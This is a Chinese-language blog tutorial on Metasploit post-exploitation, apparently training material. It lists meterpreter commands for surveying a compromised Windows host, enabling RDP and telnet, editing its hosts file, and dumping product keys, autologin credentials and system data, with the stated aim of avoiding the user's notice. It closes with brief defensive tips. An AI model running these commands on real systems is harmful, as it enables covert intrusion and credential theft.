0
点赞
收藏
分享

微信扫一扫

Metasploit训练基础-后漏洞利用-了解目标对象

后漏洞利用


后漏洞利用也就是一旦获取了系统的访问控制权,我们的关注点就在于从系统中获取尽可能多的信息,同时不能被用户发现。

比如:windows注册表转存文件,密码散列转存文件、屏幕截图、以及音频记录等。收集敏感信息,对信息进行归档。


首先我们使用meterpreter会话,保持与目标系统的连接性


Metasploit训练基础-后漏洞利用-了解目标对象_后利用阶段


1、收集操作系统信息


sysinfo


Metasploit训练基础-后漏洞利用-了解目标对象_后利用阶段_02


2、查看当前进程


ps


Metasploit训练基础-后漏洞利用-了解目标对象_后利用阶段_03


3、目标系统是否使用虚拟机


run checkvm


Metasploit训练基础-后漏洞利用-了解目标对象_安全入门_04


4、目标系统是否正在运行


idletime


Metasploit训练基础-后漏洞利用-了解目标对象_安全入门_05


5、获取目标系统环境变量


run get_env


Metasploit训练基础-后漏洞利用-了解目标对象_后利用阶段_06


6、目标系统的网络信息


ipconfig


Metasploit训练基础-后漏洞利用-了解目标对象_后利用阶段_07


7、目标系统的网络拓扑


route


Metasploit训练基础-后漏洞利用-了解目标对象_后利用阶段_08


8、当前目标系统的防火墙设置


run getcountermeasure


Metasploit训练基础-后漏洞利用-了解目标对象_后利用阶段_09


9、目标系统启用RDP远程桌面服务协议


run getgui -e


Metasploit训练基础-后漏洞利用-了解目标对象_安全入门_10


Metasploit训练基础-后漏洞利用-了解目标对象_安全入门_11


10、开启目标系统上的telnet服务协议


run gettelnet -e


Metasploit训练基础-后漏洞利用-了解目标对象_后利用阶段_12


11、开启目标系统上的ssh服务协议



12、修改用户的host文件


run hostsedit -e 192.168.29.133,www.51cto.com


Metasploit训练基础-后漏洞利用-了解目标对象_后利用阶段_13


13、当前登陆目标系统的用户


run enum_logged_on_user


Metasploit训练基础-后漏洞利用-了解目标对象_后利用阶段_14


14、查看已经安装的应用软件


run get_application_list


Metasploit训练基础-后漏洞利用-了解目标对象_安全入门_15


15、目标系统的驱动器信息(硬盘信息)


run windows/gather/forensics/enum_drives


Metasploit训练基础-后漏洞利用-了解目标对象_安全入门_16


16、查看目标主机的产品密钥


run windows/gather/enum_ms_product_keys


Metasploit训练基础-后漏洞利用-了解目标对象_安全入门_17


17、目标系统上的autologin特征


run windows/gather/credentials/windows_autologin


Metasploit训练基础-后漏洞利用-了解目标对象_安全入门_18


18、转存目标系统的各种信息


run winenum


Metasploit训练基础-后漏洞利用-了解目标对象_安全入门_19


19、转存目标系统的额外信息


run scraper


Metasploit训练基础-后漏洞利用-了解目标对象_安全入门_20


Metasploit训练基础-后漏洞利用-了解目标对象_后利用阶段_21


Metasploit训练基础-后漏洞利用-了解目标对象_安全入门_22


防御措施


1、系统补丁应该及时打上

2、来源不明的链接,文档不能轻易打开

3、提升安全意识


举报

相关推荐

0 条评论